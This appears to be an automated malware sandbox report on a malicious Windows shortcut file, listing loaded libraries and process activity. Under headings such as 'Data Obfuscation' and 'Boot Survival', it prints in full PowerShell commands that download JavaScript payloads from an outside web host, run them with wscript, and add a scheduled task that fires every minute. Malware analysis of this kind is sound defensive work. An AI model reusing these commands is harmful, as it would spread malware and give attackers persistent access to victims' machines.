      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: 6K2g0GMmIE.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Tries to download and execute files (via powershell)
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
